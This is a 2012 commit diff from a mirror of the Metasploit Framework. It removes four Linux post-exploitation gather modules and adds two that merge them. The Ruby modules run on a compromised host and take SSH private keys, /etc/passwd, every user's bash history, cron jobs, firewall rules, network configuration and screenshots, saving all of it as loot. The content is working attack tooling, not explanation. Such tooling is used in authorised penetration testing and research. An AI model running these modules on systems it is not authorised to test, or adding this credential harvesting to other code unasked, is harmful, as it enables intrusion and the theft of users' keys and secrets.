infosecn1nja
/
metasploit-framework
mirror of https://github.com/infosecn1nja/metasploit-framework.git
1
0
Fork 0
Code Issues Packages Projects Releases Wiki Activity

Merge branch 'my-branch' of https://github.com/ohdae/metasploit-framework

unstable
sinn3r 2012-03-14 05:14:33 -05:00
parent ecb1fda682 fbd076e749
commit 9d7e22876c
6 changed files with 343 additions and 474 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

79
modules/post/linux/gather/enum_cron.rb
View File

@ -1,79 +0,0 @@
##
# $Id$
##
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# web site for more information on licensing and terms of use.
# http://metasploit.com/
##
require 'msf/core'
require 'rex'
require 'msf/core/post/common'
require 'msf/core/post/file'
require 'msf/core/post/linux/priv'
class Metasploit3 < Msf::Post
include Msf::Post::Common
include Msf::Post::File
include Msf::Post::Linux::Priv
include Msf::Auxiliary::Report
def initialize(info={})
super( update_info( info,
'Name' => 'Linux Cron Job Enumeration',
'Description' => %q{
This module lists cron jobs for each user on the machine and saves it to loot.
},
'License' => MSF_LICENSE,
'Author' =>
[
'Stephen Haywood <averagesecurityguy[at]gmail.com>',
],
'Version' => '$Revision$',
'Platform' => [ 'linux' ],
'SessionTypes' => [ "shell", "meterpreter" ]
))
end
# Run Method for when run command is issued
def run
if is_root?
print_status("Enumerating as root")
users = execute("/bin/cat /etc/passwd | cut -d : -f 1").split("\n")
cron_data = ""
users.each do |user|
cron_data += "*****Listing cron jobs for #{user}*****\n"
cron_data += execute("crontab -u #{user} -l") + "\n\n"
end
else
user = execute("/usr/bin/whoami")
user.strip! if user
print_status("Enumerating as #{user}")
cron_data = "***** Listing cron jobs for #{user} *****\n\n"
cron_data += execute("crontab -l")
end
# Save cron data to loot
save("Cron jobs", cron_data)
end
# Save enumerated data
def save(msg, data, ctype="text/plain")
ltype = "linux.enum.cron"
loot = store_loot(ltype, ctype, session, data, nil, msg)
print_status("#{msg} stored in #{loot.to_s}")
end
def execute(cmd)
vprint_status("Execute: #{cmd}")
output = cmd_exec(cmd)
return output
end
end

237
modules/post/linux/gather/enum_linux.rb
View File

@ -1,237 +0,0 @@
##
# $Id$
##
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# web site for more information on licensing and terms of use.
# http://metasploit.com/
##
require 'msf/core'
require 'rex'
require 'msf/core/post/common'
require 'msf/core/post/file'
require 'msf/core/post/linux/system'
class Metasploit3 < Msf::Post
include Msf::Post::Common
include Msf::Post::File
include Msf::Post::Linux::System
include Msf::Auxiliary::Report
def initialize(info={})
super( update_info( info,
'Name' => 'Linux Gather System Information',
'Description' => %q{
This module gathers basic system information from Linux systems.
It enumerates users, hashes, services, network config, routing table, installed packages,
screenshot, and bash_history.
},
'License' => MSF_LICENSE,
'Author' =>
[
'Stephen Haywood <averagesecurityguy[at]gmail.com>',
'sinn3r', #Modified the original, and more testing
'Carlos Perez <carlos_perez[at]darkoperator.com>' # get_packages and get_services
],
'Version' => '$Revision$',
'Platform' => [ 'linux' ],
'SessionTypes' => [ "shell" ]
))
end
# Run Method for when run command is issued
def run
host = get_host
user = execute("/usr/bin/whoami")
print_status("Module running as #{user}")
# Collect data
distro = get_sysinfo
print_good("Info:")
print_good("\t#{distro[:version]}")
print_good("\t#{distro[:kernel]}")
print_status("Collecting data...")
users = execute("/bin/cat /etc/passwd | cut -d : -f 1")
nconfig = execute("/sbin/ifconfig -a")
routes = execute("/sbin/route")
mount = execute("/bin/mount -l")
iptables = execute("/sbin/iptables -L")
iptables_nat = execute("/sbin/iptables -L -t nat")
iptables_man = execute("/sbin/iptables -L -t mangle")
resolv = cat_file("/etc/resolv.conf")
sshd_conf = cat_file("/etc/ssh/sshd_config")
hosts = cat_file("/etc/hosts")
pwd = cat_file("/etc/passwd")
screenshot = get_screenshot
ssh_keys = get_ssh_keys
installed_pkg = get_packages(distro[:distro])
installed_svc = get_services(distro[:distro])
get_bash_history(users, user)
# Save Enumerated data
save("Screenshot", screenshot, "image/x-xwd") if screenshot
save("Linux version", distro)
save("User accounts", users)
save("Network config", nconfig)
save("Route table", routes)
save("Mounted drives", mount)
save("Firewall config", iptables + iptables_nat + iptables_man)
save("DNS config", resolv)
save("SSHD config", sshd_conf)
save("Host file", hosts)
save("SSH keys", ssh_keys) unless ssh_keys.empty?
save("Linux Installed Packages", installed_pkg)
save("Linux Configured Services", installed_svc)
end
# Save enumerated data
def save(msg, data, ctype="text/plain")
ltype = (ctype == 'image/x-xwd') ? "host.linux.screenshot" : "linux.enum"
vprint_status(msg)
loot = store_loot(ltype, ctype, session, data, nil, msg)
print_status("#{msg} stored in #{loot.to_s}")
end
# Get host name
def get_host
case session.type
when /meterpreter/
host = sysinfo["Computer"]
when /shell/
host = session.shell_command_token("hostname").chomp
end
print_status("Running module against #{host}")
return host
end
def execute(cmd)
vprint_status("Execute: #{cmd}")
output = cmd_exec(cmd)
return output
end
def cat_file(filename)
vprint_status("Download: #{filename}")
output = read_file(filename)
return output
end
def get_screenshot
vprint_status("Capturing screenshot")
xwd_filename = "/tmp/" + Rex::Text.rand_text_alpha(5) + ".xwd"
#Take a snapshot and save it.
#We leave the conversion up to the user. Tools such as gimp can open this file format.
capture = execute("xwd -root -display :0.0 -out #{xwd_filename}")
return nil if capture =~ /Command not found/i or capture =~ /refused by server/
#Download the screenshot
xwd = read_file(xwd_filename)
#Clean up
execute("rm #{xwd_filename}")
return xwd
end
def get_ssh_keys
keys = []
#Look for .ssh folder, "~/" might not work everytime
dirs = execute("/usr/bin/find / -maxdepth 3 -name .ssh").split("\n")
ssh_base = ''
dirs.each do |d|
if d =~ /(^\/)(.*)\.ssh$/
ssh_base = d
break
end
end
# We didn't find .ssh :-(
return [] if ssh_base == ''
# List all the files under .ssh/
files = execute("/bin/ls -a #{ssh_base}").chomp.split()
files.each do |k|
next if k =~/^(\.+)$/
this_key = cat_file("#{ssh_base}/#{k}")
keys << this_key
end
return keys
end
def get_bash_history(users, user)
if user == "root" and users != nil
users = users.chomp.split()
users.each do |u|
if u == "root"
vprint_status("Extracting history for #{u}")
hist = cat_file("/root/.bash_history")
else
vprint_status("Extracting history for #{u}")
hist = cat_file("/home/#{u}/.bash_history")
end
save("History for #{u}", hist) unless hist =~ /No such file or directory/
end
else
vprint_status("Extracting history for #{user}")
hist = cat_file("/home/#{user}/.bash_history")
vprint_status(hist)
save("History for #{user}", hist) unless hist =~ /No such file or directory/
end
end
def get_packages(distro)
packages_installed = nil
if distro =~ /fedora|redhat|suse|mandrake|oracle/
packages_installed = cmd_exec("rpm -qa")
elsif distro =~ /slackware/
packages_installed = cmd_exec("ls /var/log/packages")
elsif distro =~ /ubuntu|debian/
packages_installed = cmd_exec("dpkg -l")
elsif distro =~ /gentoo/
packages_installed = cmd_exec("equery list")
elsif distro =~ /arch/
packages_installed = cmd_exec("/usr/bin/pacman -Q")
else
print_error("Could not determine package manager to get list of installed packages")
end
return packages_installed
end
def get_services(distro)
services_installed = ""
if distro =~ /fedora|redhat|suse|mandrake|oracle/
services_installed = cmd_exec("/sbin/chkconfig --list")
elsif distro =~ /slackware/
services_installed << "\nEnabled:\n*************************\n"
services_installed << cmd_exec("ls -F /etc/rc.d | /bin/grep \'*$\'")
services_installed << "\n\nDisabled:\n*************************\n"
services_installed << cmd_exec("ls -F /etc/rc.d | /bin/grep \'[a-z0-9A-z]$\'")
elsif distro =~ /ubuntu|debian/
services_installed = cmd_exec("/usr/bin/service --status-all")
elsif distro =~ /gentoo/
services_installed = cmd_exec("/bin/rc-status --all")
else
print_error("Could not determine the Linux Distribution to get list of configured services")
end
return services_installed
end
end

151
modules/post/linux/gather/enum_network.rb Normal file
View File

@ -0,0 +1,151 @@
# $Id$
##
##
# ## This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# web site for more information on licensing and terms of use.
# http://metasploit.com/
##
require 'msf/core'
require 'rex'
require 'msf/core/post/common'
require 'msf/core/post/file'
require 'msf/core/post/linux/system'
class Metasploit3 < Msf::Post
include Msf::Post::Common
include Msf::Post::File
include Msf::Post::Linux::Priv
include Msf::Post::Linux::System
def initialize(info={})
super( update_info( info,
'Name' => 'Linux Gather Network Information',
'Description' => %q{
This module gathers network information from the target system
IPTables rules, interfaces, wireless information, open and listening
ports, active network connections, DNS information and SSH information.},
'License' => MSF_LICENSE,
'Author' => [
'ohdae <bindshell@live.com>', # minor additions, modifications & testing
'Stephen Haywood <averagesecurityguy[at]gmail.com>', # enum_linux
],
'Version' => '$Revision$',
'Platform' => [ 'linux' ],
'SessionTypes' => [ 'shell' ]
))
end
# Run Method for when run command is issued
def run
host = get_host
user = execute("/usr/bin/whoami")
print_status("Module running as #{user}")
# Collect data
distro = get_sysinfo
print_good("Info:")
print_good("\t#{distro[:version]}")
print_good("\t#{distro[:kernel]}")
print_status("Collecting data...")
nconfig = execute("/sbin/ifconfig -a")
routes = execute("/sbin/route -e")
iptables = execute("/sbin/iptables -L")
iptables_nat = execute("/sbin/iptables -L -t nat")
iptables_man = execute("/sbin/iptables -L -t mangle")
resolv = cat_file("/etc/resolv.conf")
sshd_conf = cat_file("/etc/ssh/sshd_config")
hosts = cat_file("/etc/hosts")
connections = execute("/usr/bin/lsof -nPi")
wireless = execute("/sbin/iwconfig")
open_ports = execute("/bin/netstat -tulpn")
updown = execute("ls -R /etc/network")
ssh_keys = get_ssh_keys
# Save Enumerated data
save("Network config", nconfig)
save("Route table", routes)
save("Firewall config", iptables + iptables_nat + iptables_man)
save("DNS config", resolv)
save("SSHD config", sshd_conf)
save("Host file", hosts)
save("SSH keys", ssh_keys) unless ssh_keys.empty?
save("Active connections", connections)
save("Wireless information", wireless)
save("Listening ports", open_ports)
save("If-Up/If-Down", updown)
end
# Save enumerated data
def save(msg, data, ctype="text/plain")
ltype = "linux.enum.network"
loot = store_loot(ltype, ctype, session, data, nil, msg)
print_status("#{msg} stored in #{loot.to_s}")
end
# Get host name
def get_host
case session.type
when /meterpreter/
host = sysinfo["Computer"]
when /shell/
host = session.shell_command_token("hostname").chomp
end
print_status("Running module against #{host}")
return host
end
def execute(cmd)
vprint_status("Execute: #{cmd}")
output = cmd_exec(cmd)
return output
end
def cat_file(filename)
vprint_status("Download: #{filename}")
output = read_file(filename)
return output
end
def get_ssh_keys
keys = []
#Look for .ssh folder, "~/" might not work everytime
dirs = execute("/usr/bin/find / -maxdepth 3 -name .ssh").split("\n")
ssh_base = ''
dirs.each do |d|
if d =~ /(^\/)(.*)\.ssh$/
ssh_base = d
break
end
end
# We didn't find .ssh :-(
return [] if ssh_base == ''
# List all the files under .ssh/
files = execute("/bin/ls -a #{ssh_base}").chomp.split()
files.each do |k|
next if k =~/^(\.+)$/
this_key = cat_file("#{ssh_base}/#{k}")
keys << this_key
end
return keys
end
end

77
modules/post/linux/gather/enum_packages.rb
View File

@ -1,77 +0,0 @@
# $Id$
##
##
# ## This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# web site for more information on licensing and terms of use.
# http://metasploit.com/
##
require 'msf/core'
require 'rex'
require 'msf/core/post/common'
require 'msf/core/post/file'
require 'msf/core/post/linux/system'
class Metasploit3 < Msf::Post
include Msf::Post::Common
include Msf::Post::File
include Msf::Post::Linux::System
def initialize(info={})
super( update_info( info,
'Name' => 'Linux Gather Installed Packages',
'Description' => %q{ Post Module to get installed packages on a Linux System},
'License' => MSF_LICENSE,
'Author' => [ 'Carlos Perez <carlos_perez[at]darkoperator.com>'],
'Version' => '$Revision$',
'Platform' => [ 'linux' ],
'SessionTypes' => [ 'shell' ]
))
end
# Run Method for when run command is issued
def run
distro = get_sysinfo
store_loot("linux.version", "text/plain", session, "Distro: #{distro[:distro]}, Version: #{distro[:version]}, Kernel: #{distro[:kernel]}", "linux_info.txt", "Linux Version")
# Print the info
print_good("Info:")
print_good("\t#{distro[:version]}")
print_good("\t#{distro[:kernel]}")
installed_pkg = get_pakages(distro[:distro])
pkg_loot = store_loot("linux.packages", "text/plain", session, installed_pkg, "installed_packages.txt", "Linux Installed Packages")
print_status("Package list saved to loot file: #{pkg_loot}")
if datastore['VERBOSE']
print_good("Packages:")
# Print the Packages
installed_pkg.each_line do |p|
print_good("\t#{p.chomp}")
end
end
end
def get_pakages(distro)
packages_installed = nil
if distro =~ /fedora|redhat|suse|mandrake|oracle|amazon/
packages_installed = cmd_exec("rpm -qa")
elsif distro =~ /slackware/
packages_installed = cmd_exec("ls /var/log/packages")
elsif distro =~ /ubuntu|debian/
packages_installed = cmd_exec("dpkg -l")
elsif distro =~ /gentoo/
packages_installed = cmd_exec("equery list")
elsif distro =~ /arch/
packages_installed = cmd_exec("/usr/bin/pacman -Q")
else
print_error("Could not determine package manager to get list of installed packages")
end
return packages_installed
end
end

81
modules/post/linux/gather/enum_services.rb
View File

@ -1,81 +0,0 @@
# $Id$
##
##
# ## This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# web site for more information on licensing and terms of use.
# http://metasploit.com/
##
require 'msf/core'
require 'rex'
require 'msf/core/post/common'
require 'msf/core/post/file'
require 'msf/core/post/linux/system'
class Metasploit3 < Msf::Post
include Msf::Post::Common
include Msf::Post::File
include Msf::Post::Linux::System
def initialize(info={})
super( update_info( info,
'Name' => 'Linux Gather Configured Services',
'Description' => %q{ Post Module to enumerate Services on a Linux System},
'License' => MSF_LICENSE,
'Author' => [ 'Carlos Perez <carlos_perez[at]darkoperator.com>'],
'Version' => '$Revision$',
'Platform' => [ 'linux' ],
'SessionTypes' => [ 'shell' ]
))
end
# Run Method for when run command is issued
def run
distro = get_sysinfo
store_loot("linux.version", "text/plain", session, "Distro: #{distro[:distro]}, Version: #{distro[:version]}, Kernel: #{distro[:kernel]}", "linux_info.txt", "Linux Version")
# Print the info
print_good("Info:")
print_good("\t#{distro[:version]}")
print_good("\t#{distro[:kernel]}")
installed_pkg = get_services(distro[:distro])
pkg_loot = store_loot("linux.services", "text/plain", session, installed_pkg, "configured_services.txt", "Linux Configured Services")
print_status("Service list saved to loot file: #{pkg_loot}")
if datastore['VERBOSE']
print_good("Services:")
# Print the Packages
installed_pkg.each_line do |p|
print_good("\t#{p.chomp}")
end
end
end
def get_services(distro)
services_installed = ""
if distro =~ /fedora|redhat|suse|mandrake|oracle|amazon/
services_installed = cmd_exec("/sbin/chkconfig --list")
elsif distro =~ /slackware/
services_installed << "\nEnabled:\n*************************\n"
services_installed << cmd_exec("ls -F /etc/rc.d | /bin/grep \'*$\'")
services_installed << "\n\nDisabled:\n*************************\n"
services_installed << cmd_exec("ls -F /etc/rc.d | /bin/grep \'[a-z0-9A-z]$\'")
elsif distro =~ /ubuntu|debian/
services_installed = cmd_exec("/usr/bin/service --status-all")
elsif distro =~ /gentoo/
services_installed = cmd_exec("/bin/rc-status --all")
elsif distro =~ /arch/
services_installed = cmd_exec("/bin/egrep '^DAEMONS' /etc/rc.conf")
else
print_error("Could not determine the Linux Distribution to get list of configured services")
end
return services_installed
end
end

192
modules/post/linux/gather/enum_system.rb Normal file
View File

@ -0,0 +1,192 @@
# $Id$
##
##
# ## This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# web site for more information on licensing and terms of use.
# http://metasploit.com/
##
require 'msf/core'
require 'rex'
require 'msf/core/post/common'
require 'msf/core/post/file'
require 'msf/core/post/linux/system'
require 'msf/core/post/linux/priv'
class Metasploit3 < Msf::Post
include Msf::Post::Common
include Msf::Post::File
include Msf::Post::Linux::System
def initialize(info={})
super( update_info( info,
'Name' => 'Linux Gather System & User Information',
'Description' => %q{ This module gathers system information. We collect
installed packages, installed services, mount information,
user list, user bash history and cron jobs
},
'License' => MSF_LICENSE,
'Author' => [
'Carlos Perez <carlos_perez[at]darkoperator.com>', # get_packages and get_services
'Stephen Haywood <averagesecurityguy[at]gmail.com>', # get_cron and original enum_linux
'sinn3r', # Testing and modification of original enum_linux
'ohdae <bindshell@live.com>', # Combined separate mods, modifications and testing
],
'Version' => '$Revision$',
'Platform' => [ 'linux' ],
'SessionTypes' => [ 'shell' ]
))
end
# Run Method for when run command is issued
def run
distro = get_sysinfo
store_loot("linux.version", "text/plain", session, "Distro: #{distro[:distro]}, Version: #{distro[:version]}, Kernel: #{distro[:kernel]}", "linux_info.txt", "Linux Version")
# Print the info
print_good("Info:")
print_good("\t#{distro[:version]}")
print_good("\t#{distro[:kernel]}")
users = execute("/bin/cat /etc/passwd | cut -d : -f 1")
user = execute("/usr/bin/whoami")
installed_pkg = get_packages(distro[:distro])
installed_svc = get_services(distro[:distro])
mount = execute("/bin/mount -l")
get_bash_history(users, user)
crons = get_crons(users, user)
save("Linux version", distro)
save("User accounts", users)
save("Installed Packages", installed_pkg)
save("Running Services", installed_svc)
save("Cron jobs", crons)
save("Mount", mount)
end
def save(msg, data, ctype="text/plain")
ltype = "linux.enum.system"
loot = store_loot(ltype, ctype, session, data, nil, msg)
print_status("#{msg} stored in #{loot.to_s}")
end
def get_host
case session.type
when /meterpreter/
host = sysinfo["Computer"]
when /shell/
host = session.shell_command_token("hostname").chomp
end
print_status("Running module against #{host}")
return host
end
def execute(cmd)
vprint_status("Execute: #{cmd}")
output = cmd_exec(cmd)
return output
end
def cat_file(filename)
vprint_status("Download: #{filename}")
output = read_file(filename)
return output
end
def get_packages(distro)
packages_installed = nil
if distro =~ /fedora|redhat|suse|mandrake|oracle|amazon/
packages_installed = execute("rpm -qa")
elsif distro =~ /slackware/
packages_installed = execute("ls /var/log/packages")
elsif distro =~ /ubuntu|debian/
packages_installed = execute("dpkg -l")
elsif distro =~ /gentoo/
packages_installed = execute("equery list")
elsif distro =~ /arch/
packages_installed = execute("/usr/bin/pacman -Q")
else
print_error("Could not determine package manager to get list of installed packages")
end
return packages_installed
end
def get_services(distro)
services_installed = ""
if distro =~ /fedora|redhat|suse|mandrake|oracle|amazon/
services_installed = execute("/sbin/chkconfig --list")
elsif distro =~ /slackware/
services_installed << "\nEnabled:\n*************************\n"
services_installed << execute("ls -F /etc/rc.d | /bin/grep \'*$\'")
services_installed << "\n\nDisabled:\n*************************\n"
services_installed << execute("ls -F /etc/rc.d | /bin/grep \'[a-z0-9A-z]$\'")
elsif distro =~ /ubuntu|debian/
services_installed = execute("/usr/bin/service --status-all")
elsif distro =~ /gentoo/
services_installed = execute("/bin/rc-status --all")
elsif distro =~ /arch/
services_installed = execute("/bin/egrep '^DAEMONS' /etc/rc.conf")
else
print_error("Could not determine the Linux Distribution to get list of configured services")
end
return services_installed
end
def get_crons(users, user)
if user == "root" and users != nil
users = users.chomp.split()
users.each do |u|
if u == "root"
vprint_status("Enumerating as root")
cron_data = ""
users.each do |u|
cron_data += "*****Listing cron jobs for #{u}*****\n"
cron_data += execute("crontab -u #{u} -l") + "\n\n"
end
end
end
else
vprint_status("Enumerating as #{user}")
cron_data = "***** Listing cron jobs for #{user} *****\n\n"
cron_data += execute("crontab -l")
end
# Save cron data to loot
return cron_data
end
def get_bash_history(users, user)
if user == "root" and users != nil
users = users.chomp.split()
users.each do |u|
if u == "root"
vprint_status("Extracting history for #{u}")
hist = cat_file("/root/.bash_history")
else
vprint_status("Extracting history for #{u}")
hist = cat_file("/home/#{u}/.bash_history")
end
save("History for #{u}", hist) unless hist =~ /No such file or directory/
end
else
vprint_status("Extracting history for #{user}")
hist = cat_file("/home/#{user}/.bash_history")
vprint_status(hist)
save("History for #{user}", hist) unless hist =~ /No such file or directory/
end
end
end